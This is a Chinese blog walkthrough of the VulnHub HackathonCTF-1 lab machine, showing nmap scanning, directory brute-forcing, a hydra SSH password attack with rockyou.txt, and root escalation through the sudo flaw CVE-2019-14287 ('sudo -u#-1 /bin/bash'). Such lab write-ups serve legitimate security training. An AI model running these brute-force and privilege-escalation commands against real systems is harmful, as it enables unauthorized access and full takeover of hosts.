Vulnhub靶场之HackathonCTF-1

最新推荐文章于 2023-07-18 22:11:05 发布
最新推荐文章于 2023-07-18 22:11:05 发布
阅读量485 收藏
点赞数 1
分类专栏: vulnhub靶机实战 文章标签: linux 信息安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SoporAeternus12/article/details/110247876
版权

Vulnhub靶场之HackathonCTF-1

靶场下载地址:http://www.vulnhub.com/entry/hackathonctf-1,591/
本机kali地址:192.168.157.144

信息收集

第一步都是nmap扫描

nmap -sP 192.168.157.144/24

在这里插入图片描述
真实机是.2,目标主机是.157
接下来扫描端口和详细信息

nmap -A 192.168.157.157 -p-

在这里插入图片描述
可以看到目标主机开放了21,23,80,7223端口
用浏览器访问80端口看看
在这里插入图片描述
这not found可太秀了,打开robots.txt看看
在这里插入图片描述
这里显示了3个路径,但这三个路径进去显示的是404,下面那个是base64编码后的字符串,我们去解码看看

c3NoLWJydXRlZm9yY2Utc3Vkb2l0Cg==

//解码后
ssh-bruteforce-sudoit

暴力破解ssh?字典去哪整呢?这一句话给我干懵逼了,没事,慢慢来,扫描一下网页目录
这里我使用bp去爆破
用bp抓包后发送到intruder,将index.html设置为变量
在这里插入图片描述
在payload那块地方选择好字典,options那里设置好线程就可以开始爆破了
在这里插入图片描述
在这里插入图片描述
这里发现sudo.html和ftc.html可以访问,赶紧看看去
先看看sudo.html页面
在这里插入图片描述
在源码那里发现了一条关键信息

#uname : test

再去看看ftc.html
在这里插入图片描述
f12发现有些被注释掉的信息,这里可以猜测到是ascii编码,我这里用python把这些ascii码转换成相应的字母或者符号

s = "#117#115#101#32#114#111#99#107#121#111#117#46#116#120#116"
//用split方法将字符串以#分隔开并将各个元素组成一个数组
s1 = s.split('#')
//删除掉第一个元素,因为第一个元素是空的
s1.pop(0)
for i in s1:
    print(chr(int(i)),end="")//end="" 为了不换行

运行结果
use rockyou.txt

爆破

现在确定了用户名和相应的密码字典,可以爆破ssh了!

hydra -l test -P /usr/share/wordlists/rockyou.txt ssh://192.168.157.157 -vV -f -s 7223

在这里插入图片描述

test:jordan23

建立连接

ssh test@192.168.157.157 -p 7223
test@192.168.157.157's password: 
Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic x86_64)

 * Documentation:  https://help.ubuntu.com/
New release '16.04.7 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Fri Nov 27 05:23:48 2020 from 192.168.157.144
test@ctf:~$

提权

去了家目录逛了一圈发现有两个文件夹,ctf和test,但里面没有什么有用的,sudo -l发现也没啥命令可以用

test@ctf:/home$ sudo -l
[sudo] password for test: 
Matching Defaults entries for test on ctf:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User test may run the following commands on ctf:
    (ALL, !root) ALL
test@ctf:/home$

这边看一下sudo的版本

test@ctf:/home$ sudo -V
Sudo version 1.8.9p5
Sudoers policy plugin version 1.8.9p5
Sudoers file grammar version 43
Sudoers I/O plugin version 1.8.9p5
test@ctf:/home$

版本有点低,其实这个版本有一个关于sudo提权的漏洞是可以使用的

CVE-2019-14287

该漏洞对1.8.28以下的版本都有用,这里我就不详细说明该漏洞了,感兴趣的同学可以去这里看看这个链接:https://baijiahao.baidu.com/s?id=1647429741181134559&wfr=spider&for=pc
接下来直接利用该漏洞就可以成功提权了

test@ctf:/home$ sudo -u#-1 id -u
0
test@ctf:/home$ sudo -u#-1 /bin/bash
root@ctf:/home#

总结

这次靶机也是比较简单的,关键点就是爆破和字典的选择,其次是对于CVE-2019-14287这个漏洞是否了解,老实说,我第一次做的时候在爆破网站目录的时候卡了很久,因为字典里没有那几个关键的目录,而且没想到robots.txt就提示了一些目录信息。
感觉爆破这个东西挺看脸的,可能是我比较菜吧。
新人发帖,希望大家多多包含,如果大家发现我某些地方讲解有误或者不严谨,请告诉我,我将感激不尽

W3de
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhubHACKATHONCTF: 1
weixin_44537595的博客
11-05 653
靶场:http://www.vulnhub.com/entry/hackathonctf-1,591/ 查看对方的主机mac地址 我们用我们的kali进行存活主机扫描 命令:nmap -sS -sC -sV -p1-10000 192.168.25.0/24 搜索到对方主机的ip地址为 192.168.25.84 3. 扫描对方所开放的端口及一些其他信息,并保存/tmp/下,文件名为nmap.txt 命令:nmap -A 192.168.25.84 -o /tmp/nmap.txt 4
vulnhub_HackathonCTF: 1
weixin_50698958的博客
11-06 481
靶机下载:点我 测试过程: 1、在本地启动靶场,设置网卡为VMnet8,自动获取IP,查看物理MAC 2、使用nmap扫描网段,找到IP为192.168.220.130 3、看到80端口开着,就尝试访问一下 报错,使用的是Apache服务器,版本2.4.7,百度一下存在Apache解析漏洞 4、使用御剑扫描一下后台目录,发现robots.txt 5、尝试访问一下robots.txt 发现base64加密内容 c3NoLWJydXRlZm9yY2Utc3Vkb2l0Cg==
靶机渗透练习85-HackathonCTF 1
hirak0的博客
04-28 742
靶机描述 靶机地址:https://www.vulnhub.com/entry/hackathonctf-1,591/ Description N/A 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.3 靶机: IP地址:192.168.9.2 注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式) 该靶机环境搭建如下 将下载好的靶机环境,导入 VritualBox,设置为 Host-Only 模式 将 VMware 中桥接模式网卡设置
vulnhub靶机 Os-hackNos-1
weixin_46107179的博客
03-02 3856
Os-hackNos-1: 靶机下载 https://www.vulnhub.com/entry/hacknos-os-hacknos,401 下载好靶机之后,如果通过虚拟机打开,不能获取ip地址,kali机也扫描不到靶机ip地址的话,就在启动界面按shift,会出现该画面 然后按e进入编辑界面,将ro改为rw single init=/bin/bash 然后按Ctrl+x进入命令行,ip -a查看网卡,名称为ens33,然后对网卡信息进行编辑 vim /etc/network/interfaces改为如下
渗透靶场--HackathonCTF 2
weixin_45794666的博客
07-20 525
HackathonCTF 2 1.首先nmap扫描获得ip 2.扫描全端口并记录信息 nmap -T4 -sC -sV -p- --min-rate=1000 -oN nmap.log 192.168.19.141 3.可以看到ftp上匿名用户可以得到flag1.txt和word.dir 4.那么接下来就是利用这个字典爆破ssh 5.还有一个80端口,目录扫描得到一个happy目录,查看源代码获取到用户名 6.hydra ssh爆破 hydra -l hackathonll -P word.dir
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
vulnhub靶场实战系列-DC-3实战
最新发布
05-20
vulnhub靶场实战系列-DC-3实战
vulnhub靶场实战系列-DC-1实战流程图
05-17
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。...
HACKATHONCTF_1靶场详解
weixin_44681307的博客
07-18 163
就用GPt搜索了一下,发现是个txt,这个txt是个密码字典,我猜测就是告诉我们后面需要爆破。登陆上以后sudo -l发现一个很奇怪的权限,就Google搜索了一下,发现可以一行代码提权。扫到ip后对ip进行一个单独扫描,发现开了四个端口,ssh设置到7223上了,这个很重要。打开网页主页是一个错误页面,就又对页面进行了一个扫描,发现有几个可以登陆的页面。在ftc.html页面中发现很多数字写在了源代码中,不知道有什么用。所以就用美杜莎爆破了一下,没想到很快密码就爆破出来了。密码:jordan23。
靶机渗透练习86-HackathonCTF 2
hirak0的博客
04-29 575
靶机描述 靶机地址:https://www.vulnhub.com/entry/hackathonctf-2,714/ Description Difficulty: Easy This is a basic level BootToRoot machine for beginners. There are two flags. After finding the flag, tag me on Twitter(@Markme_1). 一、搭建靶机环境 攻击机Kali: IP地址:192.168.12
Linux sudo权限提升漏洞(CVE-2021-3156)复现
weixin_47531489的博客
07-20 411
1简介 2021年1月26日,Linux安全工具sudo被发现严重的基于堆缓冲区溢出漏洞。利用这一漏洞,攻击者无需知道用户密码,一样可以获得root权限,并且是在默认配置下。此漏洞已分配为CVE-2021-3156,危险等级评分为7分。2 漏洞概述 当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或-i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。因此只要存在sudoers文件(通常是/etc/sudoer...
HACKATHONCTF 2靶机
logan_logan的博客
07-19 224
1.端口扫描 端口扫描发现FTP可以匿名登录,同时SSH登录端口被改为7223; 2.匿名登录FTP 登录成功之后发现两个文件,下载到本地进行打开; word.dir文件是以dir为后缀结尾,猜测这个文件是目录字典; 3.目录扫描 使用这个文件作为目录字典进行枚举; 成功枚举出happy目录,在网页打开,发现了一个用户名; 4.暴力破解 使用这个用户hackathonll进行暴力破解登录,尝试了好几个字典,最后还是用这个word.dir文件成功得出密码; 成功登录之后使用sudo -l发现vim可
vulnhub--HackathonCTF:2
venu_s的博客
06-22 288
靶机介绍 difficult:easy goal:get two flags download:https://www.vulnhub.com/entry/hackathonctf-2,714/ 信息探测 主机发现 端口扫描 查看端口的的详细信息,21端口可以使用anonymous身份登陆,有flag1.txt和word.dir两个文件;7223是ssh端口 目录扫描,有一个/happy 访问80端口,没什么发现,查看源代码,也没什么发现 访问/happy 查看源码,发现一个用户名 至此,网页的
【漏洞公告】CVE-2017-1000367:Sudo本地提权漏洞
bystarlight的博客
06-02 6057
原文链接 2017年5月30日,国外安全研究人员发现Linux环节下,可以通过sudo实现本地提权漏洞,漏洞编号为CVE-2017-1000367,该漏洞几乎影响了所有Linux系统。  具体详情如下:                                                                                 漏洞编号:   CVE
SegmentFault Hackathon 2018 —— 探索区块链,见证 geek 盛会!
weixin_33923148的博客
05-08 160
Hackathon —— 程序员的狂欢 黑客马拉松( hackthon ),也叫“编程马拉松”。以下是维基百科的定义: 编程马拉松(英语:hackathon,又译为黑客松),又称黑客日(hack day)、黑客节(hackfest)或编程节(codefest),是一个流传于黑客(hacker)当中的新词汇。编程马拉松是一种活动。在该活动当中,电脑程序员以及其他与软件发展相关的人员,如图形设计师、...
vulnhub】---FristiLeaks_1.3靶机
qq_43168364的博客
08-22 847
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:FristiLeaks: 1.3靶机(192.168.15.155) 攻击机:kali Linux(192.168.15.129) 相关设置 根据官网的提示这里需要给靶机设置MAC地址 设置好了之后就可以开心的玩耍了。 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:arp-scan -l 命令:netdiscover -i eth0 -r
vulnhub靶场渗透学习-JIS-CTF
博闻强记,慎思笃行
04-17 3852
实验环境 攻击机:KALI 目标机:JIS-CTF 使用Vmware虚拟机中NAT网络 网段为192.168.1.0/24 解题过程 基本信息探测 netdiscover -r 192.168.1.0.24 可以看到靶机地址是192.168.1.132 nmap -A 192.168.1.132 可以看到靶机开放了两个端口 22 和80 对...
vulnhub靶场通关
09-09
1. 环境搭建:下载靶场环境,并启动靶场环境。 2. 信息收集:通过探测靶机真实IP和开放的端口及服务进行信息收集。 3. 访问web站点:访问web站点并进行网站的扫描和漏洞探测。 4. 利用漏洞:使用Metasploit框架(MSF)...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值